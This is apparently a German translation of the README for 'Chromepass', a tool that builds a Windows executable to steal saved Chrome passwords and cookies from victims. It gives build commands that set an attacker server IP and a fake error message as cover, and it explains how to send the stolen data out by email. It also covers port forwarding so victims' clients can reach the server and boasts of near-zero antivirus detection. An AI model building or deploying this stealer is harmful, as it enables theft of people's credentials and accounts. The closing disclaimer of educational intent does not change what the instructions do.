
Chromepass - Hacking von Chrome-gespeicherten Passwörtern
Demo anzeigen
·
Fehler melden
·
Funktion vorschlagen
Chromepass ist eine auf Python basierende Konsolenanwendung, die eine Windows-ausführbare Datei mit den folgenden Funktionen erstellt:
Die neue Methodik zur Erstellung des Clients gewährleistet praktisch eine Erkennungsrate von 0 %, selbst ohne Maßnahmen zur Umgehung von Antivirenprogrammen. Sollte dies in Zukunft nicht mehr zutreffen, werden Methoden implementiert, um die AV-Umgehung zu verbessern.
Ein Beispiel aktueller Scans (Hinweis: Innerhalb von 10-12 Stunden steigen wir von 0-2 Erkennungen auf 32 Erkennungen, führen Sie daher die Analyse mit Ihren eigenen Builds durch):
Dies ist eine sehr einfache Anwendung, die nur Folgendes verwendet:
Es wird empfohlen, die Installation in einer Windows-VM durchzuführen. Einige Teile des Installationsvorgangs können durch vorhandene Konfigurationen beeinträchtigt werden. Getestet wurde dies auf einer sauberen Windows 10-VM.
Chromepass benötigt Windows zum Kompilieren! Unterstützung für Linux und macOS wird möglicherweise bald hinzugefügt.
git clone https://github.com/darkarp/chromepass
Hinweis: Alternativ zum Klonen des Repositorys können Sie die neueste Version herunterladen, da das Repository möglicherweise fehleranfälliger ist.
Die Abhängigkeiten werden automatisch überprüft und installiert, sodass Sie direkt zu Verwendung springen können. Es wird empfohlen, eine saubere VM zu verwenden, um Konflikte zu vermeiden.
Wenn Sie die Abhängigkeiten nicht haben und Ihre Internetverbindung nicht schnell ist, wird dies eine Weile dauern. Holen Sie sich in der Zwischenzeit einen Kaffee.
Chromepass ist sehr einfach. Starten Sie mit der Ausführung von:
python create.py -h
Eine Liste der Optionen wird angezeigt und ist selbsterklärend.
Die Ausführung ohne Parameter erstellt den Server und den Client, die eine Verbindung zu 127.0.0.1 herstellen.
Ein einfaches Beispiel für einen Build:
python create.py --ip 92.34.11.220 --error --message 'Ein Fehler ist aufgetreten'
Nachdem Sie Server und Client erstellt haben, stellen Sie sicher, dass der Server läuft, wenn der Client ausgeführt wird.
Die Cookies und Passwörter werden in json-Dateien in einem neuen Ordner namens data im selben Verzeichnis wie der Server gespeichert, getrennt nach IP-Adresse.
Chromepass unterstützt das Senden der Dateien per E-Mail, obwohl dies noch experimentell ist.
Um dies zu aktivieren, können Sie das Flag --email beim Erstellen des Servers verwenden. Sie benötigen zwei Dinge: einen Benutzernamen (Ihre E-Mail) und ein Passwort (ein App-Passwort).
Um ein App-Passwort zu generieren, müssen Sie zu Ihren Kontoeinstellungen -> Sicherheit gehen und die Zwei-Faktor-Authentifizierung aktivieren (erforderlich!).
Nachdem die Zwei-Faktor-Authentifizierung aktiviert ist, sehen Sie eine neue Option namens App-Passwörter:

Sie klicken dort und wählen dann die entsprechenden Optionen aus und generieren ein Passwort:

Nachdem Sie auf Generieren geklickt haben, erhalten Sie das benötigte Passwort.
Sie können den Benutzernamen und das Passwort direkt im Befehl verwenden oder einfach in die config.ini einfügen, wo YOUR_USERNAME und YOUR_PASSWORD stehen.
python create.py --error --message 'Ein Fehler ist aufgetreten' --email --username [email protected] --password qwertyuiopasdfghh
python create.py --error --message 'Ein Fehler ist aufgetreten' --email
Wenn Sie dies in einem Remote-Szenario verwenden möchten, müssen Sie auch Portweiterleitung durchführen (standardmäßig Port 80), damit das Opfer beim Ausführen des Clients eine Verbindung zum Server auf dem richtigen Port herstellen kann. Allgemeinere Informationen finden Sie hier. Wenn Sie immer noch nicht zufrieden sind, führen Sie eine Google-Suche durch.
Das automatisierte Setup ist experimentell. Aus dem einen oder anderen Grund könnte das Setup die Abhängigkeiten nicht korrekt installieren. Wenn dies der Fall ist, müssen Sie sie manuell installieren.
Glücklicherweise gibt es nur 2 Abhängigkeiten:
Anstelle der Build-Tools können Sie auch einfach Visual Studio installieren, es wird jedoch mehr Speicherplatz benötigt.
Nach erfolgreicher Installation der Build-Tools können Sie einfach die rustup-init.exe von der Rustup-Website ausführen.
Damit sind die erforderlichen Abhängigkeiten installiert und Sie können loslegen.
Wenn Sie einen Fehler oder einen Bug finden, melden Sie ihn bitte als Issue. Wenn Sie eine Funktion oder Verbesserung vorschlagen möchten, melden Sie dies bitte auf den Issue-Seiten.
Bitte folgen Sie den Vorlagen, die beim Erstellen des Issues angezeigt werden.
Für den Zugang zu einer Community voller angehender Computersicherheitsexperten, vom absoluten Anfänger bis zum erfahrenen Veteran, treten Sie unserem Discord-Server bei: WhiteHat Hacking
Wenn Sie mich kontaktieren möchten, können Sie dies tun unter: [email protected]
Ich bin nicht verantwortlich für das, was Sie mit den bereitgestellten Informationen und dem Code tun. Dieses Tool ist nur für berufliche oder Bildungszwecke bestimmt.
